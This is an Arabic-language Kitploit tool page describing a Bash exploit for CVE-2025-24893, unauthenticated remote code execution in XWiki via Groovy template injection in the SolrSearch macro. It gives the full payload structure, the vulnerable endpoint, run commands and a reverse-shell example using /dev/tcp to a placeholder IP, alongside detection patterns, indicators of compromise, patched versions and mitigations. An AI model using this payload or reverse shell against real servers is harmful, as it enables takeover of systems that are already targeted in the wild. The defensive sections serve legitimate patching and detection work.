Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
XWiki-Platform-RCE-CVE-2025-24893 — استغلال Bash لـ CVE-2025-24893، وهو ثغرة تنفيذ كود عن بعد غير مصادق عليها في XWiki Platform عبر حقن القالب في ماكرو SolrSearch. | Kitploit
أدوات/GitHubGitHub/0xdtc/xwiki-platform-rce-cve-2025-24893
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHub0xdtc/xwiki-platform-rce-cve-2025-24893

XWiki-Platform-RCE-CVE-2025-24893

استغلال Bash لـ CVE-2025-24893، وهو ثغرة تنفيذ كود عن بعد غير مصادق عليها في XWiki Platform عبر حقن القالب في ماكرو SolrSearch.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

استغلال تنفيذ أوامر عن بُعد غير مصادق عليه في منصة XWiki

نظرة عامة

هذا النص البرمجي هو تنفيذ مُحسَّن بلغة Bash لاستغلال الثغرة الأمنية التي تؤثر على إصدارات منصة XWiki المتأثرة بـ CVE-2025-24893. يستغل ثغرة تنفيذ أوامر عن بُعد خطيرة غير مصادق عليها تسمح للمهاجمين بتنفيذ كود Groovy عشوائي من خلال خلل في حقن القالب (Template Injection) في ماكرو SolrSearch.

تم إنشاء تطبيقات الاستغلال الأصلية بلغة Python من قبل باحثين أمنيين مختلفين، وتم تكييفها هنا لمستخدمي Bash مع تبسيط في التنفيذ وتحسين سهولة الاستخدام.

تفاصيل الثغرة الأمنية

  • المكتشف: جون كواك (مبادرة Zero Day من Trend Micro)
  • CVE: CVE-2025-24893
  • درجة CVSS: 9.8 (حرجة)
  • المراجع:
    • استشارة الأمان الرسمية لـ XWiki (GHSA-rr6p-3pfg-562j)
    • كتالوج الثغرات المستغلة المعروفة لدى CISA
    • VulnCheck - استغلال XWiki CVE-2025-24893 في البرية
    • مدونة OffSec - تنفيذ أوامر عن بُعد غير مصادق عليه في XWiki
  • الوصف: تنشأ الثغرة من عدم كفاية تنظيف الإدخال في ماكرو SolrSearch داخل منصة XWiki. يفشل الماكرو في التحقق بشكل صحيح من إدخال المستخدم في معامل text عند الوصول إليه عبر نقطة نهاية RSS للوسائط، مما يسمح للمهاجمين بحقن كود Groovy خبيث في مسار العرض دون مصادقة.

الإصدارات المتأثرة والمصححة

الإصدارات المتأثرة

  • منصة XWiki: 5.3-milestone-2 حتى 15.10.10
  • منصة XWiki: 16.0.0-rc-1 حتى 16.4.0

الإصدارات المصححة

  • XWiki 15.10.11 أو أحدث
  • XWiki 16.4.1 أو أحدث
  • XWiki 16.5.0RC1 أو أحدث

الميزات

  • تنفيذ أوامر عن بُعد غير مصادق عليه: تنفيذ أوامر نظام عشوائية دون مصادقة.
  • تجاوز رمز CSRF: استغلال حقن القالب دون الحاجة إلى رموز CSRF.
  • تنفيذ في الخلفية: تشغيل الأوامر بشكل غير متزامن على الخادم الهدف.
  • واجهة سطر أوامر بسيطة: نص Bash سهل الاستخدام مع اعتماديات قليلة.

المتطلبات الأساسية

  • الاعتماديات:
    • curl: لإرسال طلبات HTTP.
    • jq: لتشفير الحمولة بعنوان URL.
    • قشرة Bash.
  • بيئة الاختبار: نظام تشغيل Linux مع Bash.

الاستخدام

امنح صلاحيات التنفيذ:

root@kitploit:~
chmod +x CVE-2025-24893

قم بتشغيل النص البرمجي مع الوسائط المطلوبة:

root@kitploit:~
./CVE-2025-24893 <target_url> <command>

المعاملات

المعاملالوصف
<target_url>عنوان URL لمنصة XWiki الهدف (مثال: http://example.com أو https://xwiki.example.org). البروتوكول اختياري.
<command>أمر النظام المراد تنفيذه على الخادم الهدف.

مثال

التحقق من قابلية استغلال الهدف (تنفيذ أمر id):

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "id"

استرجاع معلومات النظام:

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "uname -a"

إنشاء ملف اختبار:

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "touch /tmp/pwned"
**

**قذيفة عكسية (استبدل بعنوان IP والمنفذ الخاصين بك):**
```bash
./CVE-2025-24893 http://vulnerable-xwiki.example.com "bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"

سير عمل النص البرمجي

  1. تحليل وسائط سطر الأوامر:

    • يتحقق من توفير كل من عنوان URL الهدف والأمر.
    • يقوم بتطبيع عنوان URL بإضافة http:// إذا لم يتم تحديد بروتوكول.
  2. بناء الحمولة:

    • ينشئ حمولة كود Groovy تقوم بتنفيذ الأمر المحدد باستخدام .execute().
    • يلف الحمولة في صيغة ماكرو XWiki: }}}{{async async=false}}{{groovy}}<code>{{/groovy}}{{/async}}
  3. تشفير URL:

    • يقوم بتشفير الحمولة بعنوان URL باستخدام jq لنقلها بشكل صحيح عبر HTTP.
  4. الاستغلال:

    • يرسل طلب HTTP GET إلى نقطة نهاية SolrSearch المعرضة للخطر: /xwiki/bin/get/Main/SolrSearch?media=rss&text=<encoded_payload>
    • يتم تنفيذ الأمر في الخلفية على الخادم الهدف.

التفاصيل التقنية

آلية الاستغلال

تعمل سلسلة الاستغلال على النحو التالي:

  1. حقن القالب: يقوم المهاجم بصياغة حمولة خبيثة تحتوي على كود Groovy ملفوف في صيغة ماكرو XWiki.
  2. تحديد نقطة النهاية: يتم إرسال الحمولة إلى نقطة نهاية RSS الخاصة بـ SolrSearch المعرضة للخطر.
  3. تنفيذ الكود: يتم تنفيذ كود Groovy المحقون على الخادم دون مصادقة.
  4. اختراق النظام: يحصل المهاجم على تنفيذ أوامر عشوائية بصلاحيات تطبيق XWiki.

هيكل الحمولة

root@kitploit:~
}}}{{async async=false}}{{groovy}}'<command>'.execute();{{/groovy}}{{/async}}
  • }}} - يغلق أي سياق ماكرو موجود
  • {{async async=false}} - يضمن التنفيذ المتزامن
  • {{groovy}}...{{/groovy}} - يلف كود Groovy الخبيث
  • '<command>'.execute(); - ينفذ أمر النظام المحدد

إثبات المفهوم

إعداد البيئة المعرضة للخطر

لأغراض الاختبار، يمكنك إعداد مثيل XWiki معرض للخطر باستخدام Docker:

root@kitploit:~
docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10

عرض توضيحي للاستغلال

root@kitploit:~
# انتظر حتى يبدأ XWiki (قد يستغرق 1-2 دقيقة)
./CVE-2025-24893 http://localhost:8080 "whoami"

التأثير

يسمح الاستغلال الناجح لهذه الثغرة الأمنية لمهاجم غير مصادق بما يلي:

  • تنفيذ أوامر نظام عشوائية على الخادم
  • قراءة أو تعديل أو حذف بيانات حساسة
  • اختراق تثبيت XWiki بالكامل
  • الانتقال إلى أنظمة أخرى على الشبكة
  • نشر عمال تعدين العملات الرقمية أو برمجيات خبيثة أخرى
  • إنشاء وصول خلفي دائم

الاستغلال في العالم الحقيقي

وفقًا لـ CISA وعدة بائعين أمنيين:

  • استغلال نشط: يتم استغلال CVE-2025-24893 بنشاط في البرية
  • حملات هجومية: كشفت VulnCheck عن سلاسل هجومية مكونة من مرحلتين تنشر عمال تعدين العملات الرقمية
  • كتالوج KEV لـ CISA: تمت إضافته إلى كتالوج الثغرات المستغلة المعروفة في 30 أكتوبر 2025
  • مسح واسع النطاق: مسح ضخم على مستوى الإنترنت للمثيلات المعرضة للخطر

الكشف والتخفيف

الكشف

راقب الطلبات المشبوهة إلى نقطة نهاية SolrSearch:

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*

ابحث عن الأنماط التي تحتوي على:

  • {{groovy}}
  • {{async}}
  • .execute()
  • أشكال مشفرة بعنوان URL لما سبق

مؤشرات الاختراق (IoCs)

  • عمليات غير متوقعة تم إنشاؤها بواسطة مستخدم تطبيق XWiki
  • ملفات جديدة في /tmp أو أدلة قابلة للكتابة أخرى
  • اتصالات شبكة صادرة إلى عناوين IP غير معروفة
  • عمليات تعدين العملات الرقمية (استخدام عالي لوحدة المعالجة المركزية)

التخفيف

  1. ترقية XWiki إلى إصدار مصحح:

    • الإصدار 15.10.11 أو أحدث
    • الإصدار 16.4.1 أو أحدث
    • الإصدار 16.5.0RC1 أو أحدث
  2. تطبيق حلول مؤقتة (إذا لم يكن التصحيح الفوري ممكنًا):

    • تقييد الوصول إلى نقطة نهاية SolrSearch عبر جدار حماية تطبيقات الويب (WAF)
    • تعطيل ماكرو SolrSearch إذا لم يكن مطلوبًا
    • تطبيق تجزئة الشبكة للحد من التعرض
  3. مراقبة الاختراق:

    • مراجعة السجلات لمحاولات الاستغلال
    • التحقق من تعديلات الملفات غير المصرح بها
    • فحص عمال تعدين العملات الرقمية والثغرات الخلفية

القيود

  • يتم تنفيذ الأوامر في الخلفية؛ قد لا يكون الإخراج مرئيًا فورًا.
  • يتطلب التحقق من تنفيذ الأمر طرقًا جانبية (مثل إنشاء ملفات، اتصالات شبكة).
  • يتطلب أن يكون ماكرو SolrSearch ممكّنًا في الهدف (التكوين الافتراضي).

الإسناد

  • مكتشف الثغرة: جون كواك (مبادرة Zero Day من Trend Micro)
  • مؤلفو استغلال Python الأصلي: باحثون أمنيون مختلفون
  • النص المكيف: تم تجديده بواسطة [0xdtc] مبني بلغة BASH

إخلاء المسؤولية

هذا النص البرمجي مخصص لأغراض تعليمية فقط. الاستخدام غير المصرح به لهذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها غير قانوني وغير أخلاقي. استخدم بمسؤولية.

يجب أن يكون لديك إذن كتابي صريح من مالك النظام قبل الاختبار.

المؤلف (المؤلفون) لهذه الأداة غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذا النص البرمجي. المستخدمون هم المسؤولون بالكامل عن ضمان حصولهم على التفويض المناسب والامتثال لجميع القوانين واللوائح المعمول بها.

تنزيل الأداة